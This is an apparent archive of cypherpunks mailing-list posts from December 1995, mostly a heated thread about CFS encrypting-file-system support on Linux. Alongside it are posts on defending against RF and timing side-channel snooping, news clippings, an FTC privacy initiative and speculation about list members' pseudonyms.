In-Reply-To: <199512240748.AAA13767@wero.cs.byu.edu>
Message-ID: <1T7LgD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Don M. Kitchen" <don@wero.cs.byu.edu> writes:
> Sorry for being one of those who responds to Detweiler's troll...

I wonder which of the participants are Lance...

> > So the master is at last fallen.  Kudos to Mr. Jim Choate and Dr.
> > Dimitri Vulis for having the courage of their convictions to help
> > unmask AT&T's deceit in claiming to support Linux and free software
> > when, in truth, it is doing just the opposite.

There's been a bit of confusion here. Perry Metzger stated that Matt Blaze
doesn't have Linux and shouldn't support it. Naturally, this got a few Linux
fans (like myself) overly emotional. Matt Blaze later said that he does have
Linux (contrary to what Perry said), that CFS installs fine, under his version,
and that he's been unable to duplicate the problem reported here (but will
include a fix in future distributions if someone supplies it). It's a perfectly
reasonable position. In particular, this is a much more reasonable position
than the anal-retentive one most MS Windows freeware authors take when you ask
them about running their programs under WinOS2. I told Matt what I thought of
this in private e-mail. _I_ don't have a problem with Matt Blaze.

My conjecture is that during this long holiday weekend certain contributors
are taking recreational drugs before posting to the mailing list.

> Patting yourself on the back again eh? I didn't know people as stupid
> as you knew how to use email.

That's what's wrong with the net in general. 10+ years ago, when I started
using it, it was hard to use e-mail and Usenet, so most of the people using it
had to be fairly intelligent. Today, no intelligence is required to use e-mail,
or even a cpunks anonymous remailer. I wish crypto software and mail filtering
software followed the suit and became as easy to use and transparent at the
rest of our comm software.

I've been communicating with one sci.crypt personality, who configured his
procmail to accept e-mail only from a list of people he knows. To be able to
send him e-mail, I had to contact him by other means and ask him to add my name
to the list of approved correspondents. :) He's not checking digital
signatures, just the from lines. (By the way, he's not on cypherpunks because
he considers the level of crypto expertise here to be too low.)

Is this where we're heading?

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jimbell)
Date: Sun, 24 Dec 1995 16:58:04 +0800
To: cypherpunks@toad.com
Subject: Spread-Spectrum computer clock?
Message-ID: <m0tTlLJ-00091XC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


Recently there has been a substantial amount of discussion concerning the use of
accurate timing in an attempt to uncover encryption keys, by carefully noting
the length of time that a decryption takes in a computer of a known cpu speed.
I have noticed that most of the discussion focussed on the delay time of the
overall operation done over a network, for example a LAN or perhaps the
Internet, but it has been recognized that imprecision due to indeterminate
network timings make such a tactic problematic at least.

However, being a ham and occasionally listening to the various odd noises
produced by a computer when you tune a VHF or UHF ham radio to a harmonic of the
clock speed, it ccurred to me that the delay times WITHIN a particular
encryption/decryption would  be far more easily measured with local RF snooping.
I would imagine that if you can determine even a fraction of a bit of key from a
network "ping,"  you could do a lot better "listening" to the execution of a
program within a few hundred feet with an ordinary radio receiver and a
sophisiticated analysis program.

Okay, I admit, this is certainly not a new idea.  The military's TEMPEST program
is to build electronic equipment which is so "quiet" that it is impossible (or,
at least, arbitrarily difficult) to capture useful information by inadvertent
radio transmission.

Obviously, that is out of the league (not to mention the budget) of the vast
majority of the users of personal computers.  Nevertheless, it seems to me that
if we as a community of computer users are interested in security, we should not
merely focus on the mathematics and algorithms used and their reliability, but
also secondary methods to break the systems involved.

True, most of us are not sufficiently interesting "targets" to justify this kind
of attack, but machines such as encrypted remailers are sufficiently "high
value" that protecting them would be worth a little extra effort  I'm not under
any illusion that we can hope to make them "snoop-proof", but a little effort
should substantial raise the difficulty level..

More than a year ago, it occurred to me that it might be worth it to build a CPU
clock replacement module that took the place of the main CPU crystal oscillator,
and replaced it with a oscillator module whose frequency was (very long period!)
pseudorandomly varied, possibly with a resolution of 16-bit and over a range of
perhaps 1%., with the frequency varying every few tens or hundreds of
microseconds.  The result, I presume, is that every operation synchronized to
the microprocessor clock  would vary in time and would be hard to "tune" with a
normal radio receiver.  It seems to me that this would make the resulting
computer harder to "bug" using standard equipment.

If this were do-able and were in fact done, it would probably be worth it to
"tailor" the spectrum of variation in clock speed so that these variations do
not tend to average out over "long" times, for example a few hundred
milliseconds or even tens of seconds.   This would at least help to disguise the
decryption-time information that is commonly discussed.   

A complicating factor is the fact that modern motherboards often generate their
microprocessor clocks using PLL synthesis from a master clock, probably the
14.318 MHz clock.  On the one hand, that might make the process easier; only one
clock to vary.  On the other, it is at least conceivable that there are some
devices in any given computer which depend on a precisely constant clock speed,
and would not tolerate such variation.  This was probably more true in the early
days of the IBM PC; today you usually see separate crystals on any cards that
need truly specific frequencies.



(Hey, I didn't say this was a perfect solution, merely one that would raise the
barrier a bit...)


Other potential tactics.  (Some of which are already happening; if anybody out
there is more informed about such techniques, please tell me)

0.   Copper-screen cages.  Okay, maybe this appears to be a bit too obvious, but
it really isn't too involved:  A few years ago, I happened onto a roll of
honest-to-goodness copper screen; sort of line window screen but made of pure
copper.  Sewn/soldered into a bag, it would make an excellent cover.  (openings
required for floppies and CDROMS, as well as cables are obviously a
complication, but...

1.  Use CPUs with Internal caches as well as external caches, both to reduce the
amount of electronic noise transmitted  to antenna-length wires outside the
microprocessors, as well as make external memory accesses less predictable and
less frequent.  Fortunately, I suppose, the natural transition to 486's, DX2's
and DX4/4s) and Pentiums has make this happen without any anti-snooping
motivaition.

2.  Eventually, CRT's will be replaced with some sort of matrix-type displays
that emit far less useable information and will be easier to shield.

3.  Filtering of every wire that comes out of the computer's case, primarily
using a combination of ferrite beads and decoupling capacitors.   This would be
especially true of the telephone line, which would be accessible from outside a
house or office.   Also, use of multiple powerline filters/surge protectors in
series.

4.  I'd pay particular attention to the keyboard interface and its associated
microcontroller:  Years ago, I speculated that if a VFO (voltage to frequency
converter) was placed on the data line between the  keyboard and the computer,
it would transmit the identity of every key pressed.  (This would obviously
include passwords, too)  

(Does the keyboard hardware of the typical PC allow echobacks, whcih would allow
the CPU to fill the CPU/Keyboard channel with apparently meaningless random
garbage, thwarting RF overhearing of this data?!?)


And I wouldn't be surprised if the NSA has built replacement keyboard
controllers to be used to surreptiously replace on garden-variety keyboards,
controllers which deliberately "broadcast" such information in an even
easier-to-discern pattern. Even a short access to such a keyboard and it might
be telling your  secrets.  

Even if a  black-bag job wasn't possible,  If it were possible to tune to its
normal keyboard microprocessor operation rate, and given a known keyboard scan
pattern a particular pressed key could be identified.  Given how cheap keyboards
are these days, a slightly paranoid person might buy one from a trustworthy
source and glue the case  shut to prevent tampering, and replace it monthly with
cast-offs.

5.    While this isn't my area of expertise, it occurs to me that softrware
should be written to complete operations in an identical time frame, no matter
the input data.  While this has already been hashed over on the nets, the
"solution" that is typically discussed involves adding a null loop at the end of
the real operation, and contining only after the "wall clock" shows enough time
has passed.  This isn't an adequate solution, I think, if local RFmonitoring of
the computer can be done.  (It will know when the actual result ended)    A
better (and, sadly, more inefficient) method would involve executing BOTH
branches of  conditional jump, and only using the data generated from the
desired half at the very end..    

Another possibility might be (for certain large mathematical algorithms) is to
split up the functions and to execute them in a "random" order, with enough
"dummy" operations inserted to further disguise the  facts.  For example, if
you're multiplying two 1024-bit values to get a 2048-bit result, program this to
be  done in a pseudrandom order and intersperse any operations with pseudorandom
operations  to disguise it.  (A pseudorandom interrupt generator might help,
here.)

6.   Think like an NSA hack.  If I were such a sneaky bastard, I'd try to figure
out a way to module a visible LED on the computer's case with data, or modulate
the video display's brightness to signal slow-speed data..  



Well, that's just a few thoughts.  There's a lot more material out there that
ought to be discussed.  Admittedly, these subjects can appear to be a bit more
than a little paranoid, but without such discussion we're almost certain to be
at risk.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Mon, 25 Dec 1995 01:05:34 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: CFS and Linux
In-Reply-To: <1T7LgD3w165w@bwalk.dm.com>
Message-ID: <199512241606.IAA04460@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain



 
> That's what's wrong with the net in general. 10+ years ago, when I started
> using it, it was hard to use e-mail and Usenet, so most of the people using it
>had to be fairly intelligent. Today, no intelligence is required to use e-mail,
> or even a cpunks anonymous remailer. I wish crypto software and mail filtering
> software followed the suit and became as easy to use and transparent at the
> rest of our comm software.

Long for the good old days of bang-paths, 300 baud acoustic couplers
and UUCP maps?  see http://www.lne.com/lemay/writings/curmudgeonnet.html

> I've been communicating with one sci.crypt personality, who configured his
> procmail to accept e-mail only from a list of people he knows. To be able to
>send him e-mail, I had to contact him by other means and ask him to add my name
> to the list of approved correspondents. :) He's not checking digital
> signatures, just the from lines. (By the way, he's not on cypherpunks because
> he considers the level of crypto expertise here to be too low.)
> 
> Is this where we're heading?

Close.

Where we're headed is mail filters with PGP imbedded (PGP 3 will
make this much easier) that check incoming mail for a valid signature
for certain PGP keyid/fingerprints and pass that mail along.
Other mail that doesn't match gets tossed into a 'junk' folder
or thrown away if you really don't want to talk to anyone that you
don't already know.


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 24 Dec 1995 16:58:08 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Fred Cohen: Re: CFS and Linux
In-Reply-To: <Pine.BSF.3.91.951224012906.19267A-100000@mercury.thepoint.net>
Message-ID: <Pine.BSD.3.91.951224080819.26471A-100000@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 24 Dec 1995, Brian Davis wrote:

> On Sat, 23 Dec 1995, Perry E. Metzger wrote:
> > > Fred Cohen writes to me in private:
> ...
> > 
> > Let's see.  I guess I would start by having the police confiscate the
> > toad.com computers becfause thay are part of a criminal conspiracy to
> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> I didn't realize that AI research was that far along.  Can someone point 
> me to the specs for the computer that can become a "part of a criminal 
> conspiracy"??
> 
> EBD
> 
> 
> > daamage my reputation.  Criminal because of the recent changes in the
> > law that prohibit you from sending me information I don't want to get.
> > 
>
	the basis of the seizure is for evidence collection.  then they
    take their sweet time scrounging the disks for evidence.  If no
    evidence is found, they give it back --eventually.  I saw one case go 
    by a couple years back where they were trying to make the computer an
    accessory to the crime (I dunno, maybe it was supposed to auto-dial
    and drop the dime --no that's in 18USC as failure to snitch!)

	of course, if there are drugs involved, they confiscate it as
    spoils of the criminal act and the equipment is impounded and
    eventually sold after conviction for the benefit of their slush funds. 

	I would imagin you have seen plenty of the latter one in the
    Federal attorney's office. this also gets into the issues of private
    cryptography and that _everybody_ should give up privacy protection,
    first amendment rights, etc. so uncle can catch a few dopers, gun 
    runners, and other assorted malcreants [sic] --like the difference 
    between {mis,mal}feasance: in both cases you get fucked, but 'mal' is
    intentional... 

 
> Not a lawyer on the Net, although I play one in real life.
>
    hey, at least you admit you're having a good time!

> **********************************************************
> Flame away! I get treated worse in person every day!!
> 
    

--
--------------------------------------------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length$n&~1)/2)

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAy5vBesAAAEEAN8cl6vHXrKZ9lFfZDgfyJRr3HidW77Uio7F25QF6QXca5z/
AS3ZrWsa0CjF2nwrqmyb1E5no7dFB+70ZfK8233r7ykVkWRojT+0K71lnUZO4cjG
+d19/ehXkDpkH3iHU7Uyo4ZdXLiI6uoFDS7ilzx8PCKcgvfq7b04kQrCC2kFAAUX
tAZhdHRpbGGJAJUDBRAur/X7xUpiaI661j0BAbVUA/9RSKN5sOFVB4rjV6+a2aWD
LjD5g/+eZaB/hI98qlPP+SBwzO3+K7+JWt3Fez0gKVju228ACGkvilg2VkMtQ0zm
YCexYL0U9StzHt4xEpowpmaWx22jpEvWnI10LZvT/NO3uYg5r/ezVYc7autKvfvI
rVOo322RkA0HNVV1rqjMGw==
=UNt4
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 25 Dec 1995 00:34:26 +0800
To: cypherpunks@toad.com
Subject: TAX_zip
Message-ID: <199512241540.KAA04264@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-24-95. NYPaper:

   "Money Laundering, New and Improved. To really hide loot,
   wait for the arrival of 'cybercash.' "

      The days when you could trust a Swiss banker to hold on
      to your millions and keep his mouth shut are long gone.
      Embarrassing disclosure incidents are forcing any money
      launderer worth his pocket change to go high-tech, using
      the wonder of home-banking computer programs to zip
      money across borders. What American authorities fear the
      most, however, is the rise of "cybercash."

      "The nightmare of it is that there is no registration of
      every transaction, the way there is if you use a Visa or
      Mastercard," said Stanley E. Morris, who heads the
      financial crimes enforcement network.

   TAX_zip  (7k)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 25 Dec 1995 00:38:29 +0800
To: cypherpunks@toad.com
Subject: KID_zoo
Message-ID: <199512241541.KAA04332@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-24-95. NYPaper:

   "Case Involving Free Speech And the Internet Is Settled."

      A dispute about free speech on the Internet has been
      settled out of Court here after a local school district
      admitted that a high school principal had wrongly
      reprimanded a student for lampooning his school on the
      World Wide Web. The school district apologized to Mr.
      Paul Kim for the punitive actions. "We now know our own
      boundaries," said Ann Oxrieder, the school district's
      spokeswoman. "The Internet is unexplored territory for
      schools and we now know that when a student uses his own
      equipment and on his own time, we should stay out of
      it."

   KID_zoo  (6k)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 25 Dec 1995 00:51:34 +0800
To: cypherpunks@toad.com
Subject: RAT_357
Message-ID: <199512241548.KAA04638@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The NYPaper of 12-23 and 12-24-95 report on the arrest
   Wednesday and "suicide" yesterday of Thomas Lewis Lavy, who
   was jailed under anti-terrorism statutes for trying to
   import from Canada to Alaska 130 grams of the deadly poison
   ricin -- enough to "kill thousands of people," officials
   said. Some 40 F.B.I. agents and Army chemical warfare
   specialists mounted the assault in deadly "survivalist,
   fundamentalist" Arkansas, right deadly Ollie North's 
   recreational-poison/gun swap fly-in.

      Lavy's attorney, Sam Heuer, took sharp issue with the
      government's accusations. "It is such a tragic case,"
      Mr. Heuer said. "An overzealous U.S. Attorney in Alaska
      and a hot dog F.B.I. agent tried to paint Tom as
      something he was not. Tom was a very gentle, very kindly
      person. We have the right to have rat poison or coyote
      poison, just like we have the right to have a .357
      Magnum."


   RAT_357  (12k)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Mon, 25 Dec 1995 01:03:18 +0800
To: cypherpunks@toad.com
Subject: FTC Privacy Initiative
Message-ID: <Pine.BSD.3.91.951224110122.19209A-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
You may wish to inform yourself about the FTC Privacy Initia- 
tive: 
 
 The US Federal Trade Commission has launched a "Privacy Initia- 
 tive" to investigate whether the information collected at web- 
 sites (either that affirmatively submitted by a visitor via a 
 form or information collected based upon a visitor's selection 
 of pages at a site to reflect personal interests) should be the 
 subject of regulation by the FTC. 
 
 To get background on this effort, you may want to read a speech 
 by FTC Commissioner Varney on Electronic Commerce and Privacy 
 which is available at the FTC's site under speeches 
 
                     http://www.ftc.gov 

 or [at] the Advertising Law Internet Site 
 
             http;//www.webcom.com/~lewrose/home.html 
 
 under speeches. 
 
 This week the staff of the FTC established a mailing list to 
 allow interested parties to discuss the issues surrounding the 
 privacy interests of consumers visiting web sites.  To subscribe, 
 send the message 
 
                        subscribe 

 to 
 
                  privacy-request@ftc.gov 
 
 
                          ---- 
 
 
The above is an excerpt from a 12 20 95 message to another list. 
 
 
Cordially, 
 
Jim 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Daniel S. Riley" <dsr@lns598.lns.cornell.edu>
Date: Mon, 25 Dec 1995 01:05:14 +0800
To: cypherpunks@toad.com
Subject: [Noise] Re: Alta Vista caches queries
In-Reply-To: <199512220220.DAA27203@utopia.hacktic.nl>
Message-ID: <9512241608.AA07620@lns100.lns.cornell.edu>
MIME-Version: 1.0
Content-Type: text/plain



In article <199512220220.DAA27203@utopia.hacktic.nl>
nobody@REPLAY.COM (Anonymous) writes:
nobody> I just stopped in on Digital's new Alta Vista page, and was
nobody> surprised to find that the query field was filled in--with a
nobody> search I ran 3 or 4 days ago.

The forms interface for Alta Vista uses METHOD="GET", which means the
parameters for the query are encoded in the URL, not transmitted
separately as it would be for METHOD="POST".  For example, a search
for "cypherpunks" sends a request for the URL

http://www.altavista.digital.com\
/cgi-bin/query?what=web&q=cypherpunks&Submit.x=0&Submit.y=0&pg=q

If I bookmark that URL and return to it later, Alta Vista will rerun
the query just as it did the first time (btw, the first two hits from
that search are detweiler pages).  On several visits to

http://www.altavista.digital.com/

I see no evidence that they are caching queries, so I suspect you
cached the query yourself by bookmarking a search result.

Of course, this does not mean that one shouldn't have the usual
privacy concerns that apply to any WWW service...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Mon, 25 Dec 1995 07:19:22 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: CFS and Linux (fwd)
In-Reply-To: <199512231640.LAA07020@jekyll.piermont.com>
Message-ID: <Pine.OSF.3.91.951224121240.29643B-100000@gaston.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 23 Dec 1995, Perry E. Metzger wrote:

< elided>
> 
> Setting up and doing work on a new operating system is *WORK*. It
> takes time. It takes space in your lab or office. Maybe he just
> doesn't feel like spending that time, effort, and lab budget. Why
> should he? CFS is a GIFT. It isn't a product. Maybe if you paid
> someone to maintain a Linux version you would have one, but you aren't
> paying a penny. Quit looking a gift horse in the mouth.
> 
> .pm
> 

I concur it is work!!!! and very time consuming. And it also takes time 
away from other projects, and if you are like most of us we don't have 
enough time for our current projects.

Dan
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 25 Dec 1995 07:10:46 +0800
To: cypherpunks@toad.com
Subject: Re: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE??
Message-ID: <199512242051.MAA24295@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, it looks like somebody finally seconded my vote for AT&T &
Netscape to win the Christmas Net Scrooge Award.

His words were: "It makes me sick ... it's like the Nazi's sending out
the Brownshirts to break the windows for all the looters."

So, I'll just repost the entire nomination without any editting.

Even though I've gotten Christmas wish #2 (Bob Dole is NOT going to
Bosnia), I think it's still topical, since I'm still waiting on 
Christmas wish #1 and #3.

So ... just in case Santa is listening ... and since I already got
wish #2, rather than just bringing Peace on Earth and Goodwill to All
Men, which everybody asks for, anyhow -- could Santa do something about
the Big Bad Oil Companies who want to drill in the Arctic National
Wildlife Refuge??  

I _know_ that Santa wants to protect the sensitive tundra around his
Northern home. 

We all know that we aren't short of oil on the North American
continent, like the Big Bad Oil Companies would have us believe.  The
Canadian tar sands in Alberta have proven reserves larger than Saudi 
Arabia, and are already a proven technology, and Torch Energy out of 
Texas is already a player, there, I think.

No need to disturb the Wildlife.

Protecting some Cariboo, would be a right friendly Christmas present, 
from Santa, if he can pull some strings.  

Thanks Santa.  (if you're listening, I mean ...)

(And now, for the repost ...)

- - - - - - - - - - - - - - - - - - - - - 

Just in case, anyone missed this yesterday, I thought I'd
renominate AT&T & Netscape for the:

          *** 1995 CHRISTMAS NET SCROOGE ***

                    *** AWARD ***

    (T-shirt sales coming soon, to a website near you ...)

                     ------------

Alice here ...

Back on Tue, 19 Dec 1995, I wrote:

>>>Can anyone tell me whether Ian Goldberg and David Wagner got their
>>>$25,000 from Netscape for finding the HUGE security flaws in Netscape's
>>>existing product line??
>>>
>> >I can't remember whether they got anything or not ...
>> 
>> That would be no (well, except for the nifty T-shirt from Sameer; Thanks!).
> 
> Not anything??  That's shameful ... where on earth are the values in 
> America, today?  

Everyone should ask this question.  AT&T can sign-on to a two-page ad,
calling on Congress to balance the budget -- to cut off veterans, and
cut-off women with dependent children just before Christmas.  It can
sign on to this, but it can't bother to even offer a scholarship to
the students who helped make its fortunes.  It would rather leave the
impression that it freeloads off of other's efforts.

It's shameful.

> AT&T and Netscape have jointly made a small fortune distributing this
> product, and yet NEITHER company feels that the software engineers who
> "voluntarily" made a difference -- a couple of students -- deserve
> even a wooden nickel for the ideas which were used.
> 
> It's absolutely shameful.  But then, I guess that AT&T and Netscape
> have no shame at all.
> 
> They just steal "intellectual property" from students, and don't even
> pay a token amount.
> 
> And people wonder what's wrong with America?

Luckily for those of us who don't live in the United States, we can
perhaps look at that country and truly wonder what is going on over
there, and what is wrong with America?

Where are the values amongst ALL Americans, not just Netscape and
AT&T?  What are the role models that all the leaders -- business,
sports, and political leaders -- show to the national youth.

Here is all I've seen (as a foreigner), over the last while:

Enid Greene Waldholtz blubbering in a news conference about how she as
a congress person certainly COULDN'T be expected to resign after
winning her election with stolen money.  Blubbering for five hours
straight (except when she had to stop to turn a page, I mean) ... She
certainly said that "leadership" is all about playing "victim".  Poor
little Enid. (And even worse, she was _defended_ by Susan Molinari.)

Bob Dole, deciding to go to Bosnia.  The former WW II veteran
willingly jeopardizing the lives of American boys -- boys who have put
their lives on the line in a _volunteer_ armed force -- all for a
lousy political photo-op.  The chance to say ... "hey look at me, I'm
here in Bosnia."  Someone who's willing to overrule the Pentagon's own
most diplomatic advice on how complex an operation this actually is.

And then there is AT&T.  A company who's Chairman can publish a letter
which calls on Congress to cut off checks to mothers with dependent
children and war veterans days before Christmas, all while stealing
and freeloading off of the work of some students.

Scrooge ... take heart.

Here's Holiday wish #1.  Enid do the right thing ... resign.  Say the
"right thing" and say that your child -- the future and the delayed
gratification that the future brings -- is much more important than
your own personal PRESENT political aspirations.

Here's Holiday wish #2.  Bob, lots of people worked their asses off to
make sure that the American fighter pilot, and the two French fighter
pilots could be rescued from Bosnia.  If you want to go and get some
photo-ops, go to Germany or Italy, and give one hell of a vote of
support to the boys that are there -- a support which could just as
easily have been given and should be given in Congress.  A _real_
strong unfettered commitment.

And here's Holiday wish #3.  AT&T.  Do the right thing.  Reward those
people who help make you a fortune.  Stand tall as an example, rather
than as an embarrassment to the nation.  You've ignored this for so
long now, that you've almost dug your own grave.  But you still have a
chance to save face.  Have the courage to take the chance when it's
offered.  Simply say that the proposal to reward David Wagner and Ian
Goldberg -- some holiday mad money and scholarships -- was lost in
committee, and approval processes -- but it WAS in the works, and it
was recommended and can now be announced just before Christmas, as a
rightful reward.

Some holiday cheer.

Will people think it's a cynical attempt at manipulation?  Yep.  But
it's a darned site better than the alternatives -- especially when you
look at possible future outcomes.  Trust me, this is far better than
calling for veterans and single mothers with children to be cut-off
just before the holidays.

Perhaps, Enid, Bob, and AT&T will all learn when to use offense and
when to use defense.  They might also learn that the best offense is a
good defense.  They might even begin to look at what "courage" truly
is, and of how difficult it can be for anyone to do the "right thing",
especially when they think that they're surrounded by minefields.  

Even when the "right thing" is in your own best interest, you not only
have to be shown the right path to take, but you have to have the
motivation and courage to make the move and take action.

Enid, Bob, and AT&T, take note.

Hopefully for the holidays, everyone finds the courage to neutralize
some portion of the vulnerability spectrum they've placed themselves
in.

> >   - Ian "There's a reason people talk about `starving grad students'..."
> > 


Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 25 Dec 1995 07:19:06 +0800
To: cypherpunks@toad.com
Subject: Re: CFS and Linux
In-Reply-To: <199512241606.IAA04460@slack.lne.com>
Message-ID: <NPLmgD8w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Eric Murray <ericm@lne.com> writes:
>
> > That's what's wrong with the net in general. 10+ years ago, when I started
> > using it, it was hard to use e-mail and Usenet, so most of the people using
> >had to be fairly intelligent. Today, no intelligence is required to use e-ma
> > or even a cpunks anonymous remailer. I wish crypto software and mail filter
> > software followed the suit and became as easy to use and transparent at the
> > rest of our comm software.
>
> Long for the good old days of bang-paths, 300 baud acoustic couplers
> and UUCP maps?  see http://www.lne.com/lemay/writings/curmudgeonnet.html

Not at all -- I welcome all progress. My first modem was 110 bps.  When we
got a 300 bps one, it seemed lightning fast (and really cut down the LD bill
for the data calls to Virginia). In fact, I'm very happy that easy-to-use
Internet software enables people to use the net who couldn't do it before.
I've been telling all my non-computer acquaintences to get onto the net
for 5--8 years, but most of them did only in the last year or two.
I wish there was real easy privacy-enhancement software that every
"clueless newbie" could use. Maybe in PGP 3...

> Where we're headed is mail filters with PGP imbedded (PGP 3 will
> make this much easier) that check incoming mail for a valid signature
> for certain PGP keyid/fingerprints and pass that mail along.
> Other mail that doesn't match gets tossed into a 'junk' folder
> or thrown away if you really don't want to talk to anyone that you
> don't already know.

Alas, this is what the future net will be like. Some out-of-band
communication will be necessary before e-mail can be exchanged;
or perhaps there will be a protocol to enable Alice to write Bob
(who doesn't know Alice) and say: "You don't know me, but Carol
vouches that it's worth your while for you to read my e-mail."

Or Alice can ask Carol to e-mail Bob directly.

Is something like this already available for FTP? :)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Mon, 25 Dec 1995 07:15:42 +0800
To: cypherpunks@toad.com
Subject: X-Mas-Pisswords
Message-ID: <199512241945.NAA06757@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain



Pseudonymous confusion.

S. Boxx and Sue D. Nym (and some others with short duration)
are proven historical nyms of Larry (Lance) Detweiler.
Vladimir S. Nuri is the going suspected (proven?) tentacle;
some believe he is Larry's better self. Dimitri Vulis seems
closely related letter-wise.

Alice originally drew attention when claiming that he had
found a 'huge hole' in Netscape (if configured to run
Postscript code). Alice (now with a penet address) is
claiming to be a Canadian and has knowledge supporting
that claim (according to other Canadians on the list).
He is still attacking Netscape (and ATT) now and then,
in between political causeries.

The obvious other Alice('s) posted for a short period
mainly to make a point about signatures.

Fred Cohen once(?) had a reputation as a virus expert,
being on the panel of various security conferences.
He has since obviously made many enemies on the firewall
list, and now also on this list. He is not a Canadian(?).
He shares Alice's concern for Postscript (and JAVA) on
the WWW but does not come anyway near Alice in political
(occasionally rather funny) muck-raking.

Analysis of writing styles clearly outdistance Larry (Nuri,
Vulis) from (the Canadian) Alice. Fred and Alice are not
as easy to separate, especially when they are flaming, but
probably they are not the same.

Pissy





 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 25 Dec 1995 07:20:13 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: CFS and Linux
In-Reply-To: <1T7LgD3w165w@bwalk.dm.com>
Message-ID: <199512241852.NAA12570@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Dr. Dimitri Vulis writes:
> There's been a bit of confusion here. Perry Metzger stated that Matt Blaze
> doesn't have Linux and shouldn't support it.

I was incorrect that he didn't have Linux, but I stand by my position
that Matt is under no obligation to support anything, or even maintain
CFS at all. Its free software. Saying that someone is obligated to do
anything for free is repugnant. If he wants to support Linux better,
thats nice of him, but no one should bitch at him if he chooses not to
work for nothing for them.

One should thank Matt for being nice enough to do any of this AT ALL.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John K. Mackenzie" <jkm3@pipeline.com>
Date: Mon, 25 Dec 1995 07:17:10 +0800
To: cypherpunks@toad.com
Subject: Mailing list
Message-ID: <30DDD1E3.3A09@nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Put me on your list if you get anything started.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Mon, 25 Dec 1995 07:08:17 +0800
To: cypherpunks@toad.com
Subject: Re: CFS and Linux
Message-ID: <199512242026.OAA02586@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> AT&T's refusal to support CFS and other so-called "secure" software
> under Linux is typical and to be expected.

This is the dumbest thread I've ever seen.

First of all, AT&T lets Matt distribute CFS and other crypto related tools
from an AT&T site.  In the current legal environment, I think that's a 
good show of "support".

Second of all, Matt has put in a lot of effort to make CFS usable to Linux
users.  I have personally gotten help on more than one occaision from Matt
with CFS and Linux, and I've seen him answer lots of questions on the CFS
users' mail list.

Here's an example:  when I first started using CFS, the documents were
formatted with a macro that wasn't included with the most popular linux
distributions.  I pointed this out to Matt and took the time to rewrite 
the docs using a different macro, so Linux users would be able to read 
